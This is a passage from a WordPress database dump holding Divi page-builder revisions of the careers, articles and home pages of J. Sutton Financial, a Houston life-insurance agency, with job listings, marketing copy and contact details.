admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,1_3,1_3\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Benefits Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" min_height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\">Service clients across the state of Texas by offering valuable benefits that protect families during troubling times.</p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Sales Manager Trainee\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Learn to lead, train, and set examples for your own team of agents. Work towards monthly goals and collaborate with managers on a daily basis to achieve record breaking results. </span></p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Call Center Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Assist our agents with appointment scheduling and client outreach. Work side by side with agents to help achieve team goals.</span></p>\n</div>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-03 23:44:51','2023-04-03 23:44:51','',38,'http://cmdev-site1.com/?p=727',0,'revision','',0),(731,1,'2023-04-03 23:49:31','2023-04-03 23:49:31','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_text_divider _builder_version=\"4.20.2\" _module_preset=\"default\" header=\"J. Sutton Financial Articles\" divider_style=\"dashed\" header_level=\"h2\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"||31px|||\" custom_margin=\"15px|||||\"]<p style=\"font-weight: 400;\">Our resource articles are created to empower you with knowledge about insurance-related products, protection, prevention, and much more. Our hope is to educate our readers so you can feel confident when discussing insurance options – everything you read is unbiased and not specific to J. Sutton Financial policies.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-13px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-85px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" include_categories=\"all\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" read_more_font=\"|700|||on|||#003372|dotted\" read_more_text_color=\"#003372\" read_more_font_size=\"16px\" pagination_font=\"||||on|||#000000|dotted\" pagination_text_color=\"#003372\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-03 23:49:31','2023-04-03 23:49:31','',615,'http://cmdev-site1.com/?p=731',0,'revision','',0),(735,1,'2023-04-03 23:52:41','2023-04-03 23:52:41','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||12px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" custom_margin=\"||152px|||\" global_colors_info=\"{}\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" box_shadow_style_button_one=\"preset2\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" box_shadow_style_button_one=\"preset2\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 23:52:41','2023-04-03 23:52:41','',138,'http://cmdev-site1.com/?p=735',0,'revision','',0),(737,1,'2023-04-03 23:53:34','2023-04-03 23:53:34','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 23:53:34','2023-04-03 23:53:34','',138,'http://cmdev-site1.com/?p=737',0,'revision','',0),(736,1,'2023-04-03 23:53:07','2023-04-03 23:53:07','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" 